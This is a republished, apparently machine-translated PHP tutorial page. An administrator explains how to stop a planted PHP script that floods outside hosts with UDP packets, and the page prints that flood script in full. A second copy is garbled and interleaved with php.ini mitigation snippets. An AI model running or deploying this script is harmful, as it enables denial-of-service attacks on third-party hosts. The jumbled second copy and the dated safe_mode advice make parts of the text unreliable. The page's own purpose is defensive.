Home >Backend Development >PHP Tutorial >Solution to phpddos attack (the server sends a large number of data packets to the external network)_PHP tutorial

Solution to phpddos attack (the server sends a large number of data packets to the external network)_PHP tutorial

WBOY
WBOYOriginal
2016-07-20 11:10:291413browse

Today, one of my machines suddenly sent a large number of data packets to the outside world, which was more than 1G per second. Although I used a policy to prohibit UDP packets, they could not be sent out, but it took up a lot of money, so I finally found a way to solve it.

Look at the source code first

The code is as follows Copy code
 代码如下 复制代码

set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
                echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER

['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
                exit;
            }
        echo "Parameters can not be empty!";
        exit;
    }

for($i=0;$i<$Sendlen;$i++){
$out .= "A";
}

$max_time = time()+$exec_time;

while(1){
$packets++;
if(time() > $max_time){
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
        if($fp){
            fwrite($fp, $out);
            fclose($fp);
    }
}

echo "Send Host:$host:$port

";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " .

round($packets*$Sendlen/1024/1024, 2) . " mb

";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/

$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>

set_time_limit(999999);

$host = $_GET['host'];
代码如下 复制代码
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
$port = $_GET ['port'];

$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;

ignore_user_abort(True);


if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
     if (StrLen($_GET['rat'])<>0 ){ echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER

 代码如下 复制代码
allow_url_fopen = Off

['SERVER_NAME'])."|".php_uname() ."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];

exit;
 代码如下 复制代码
extension=php_sockets.dll
改成
;extension=php_sockets.dll
} echo "Parameters can not be empty!"; exit; }for($i=0;$i<$Sendlen;$i++){<🎜> $out .= "A";<🎜> }<🎜><🎜>$max_time = time ()+$exec_time;<🎜><🎜>while(1){<🎜> $packets++;<🎜> if(time() > $max_time){ break; } $ fp = fsockopen ("udp://$host", $port, $errno, $errstr, 5); ($fp); }}echo "Send Host:$host:$port

";echo "Send Flow:$packets * ( $Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " .round($packets*$Sendlen/1024/1024, 2) . " mb";echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$ Sendlen/1024/1024, 2) . " mb/s";?>
The key code is The method is very simple. Send UDP packets to the target host and define an infinite loop, which will create greater pressure. This pressure is on the server that executes this script, because it first consumes a lot of its own network bandwidth, CPU and other resources. If you want to use this script to put pressure on the target site, you need to execute the script on multiple servers, DDOS Since you are using fsockopen to request the outside, then don’t let him request itSet in php.ini
The code is as follows Copy code
allow_url_fopen = Off
If so, he can still send the package
The code is as follows Copy code
extension=php_sockets .dll changed to ;extension=php_sockets.dll

Restart APACHE, IIS, NGINX
This can prevent PHP DDOS from sending packages

Other netizens said

It is very simple to set the script not to allow no timeout, 1. Disable the set_time_limit function, 2. Enable PHP's safe mode (safe_mode=on)

Disabling the socket function can directly disable all socket modules or disable the fsockopen function,

is recommended, because sockets are commonly used In order to retrieve the password by sending an email, it is recommended to turn on the safe mode directly. However,

in this case, the script will time out every 30 seconds. It is estimated that no "hacker" is lonely enough to click to start DDOS every 30 seconds. . .

Experience: This kind of problem is usually caused by website security. We should pay attention to the security of the website and the security of the server, so that it is not easy to be invaded. If you know how to use macofee, you can restrict the website. It will be better.


www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/444720.htmlTechArticleToday, one of my machines suddenly sent a large number of data packets to the outside world, which can reach more than 1G per second. Although I used The policy prohibits UDP packets from being sent out, but it takes up a lot of cup, so in the end I still want to...
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn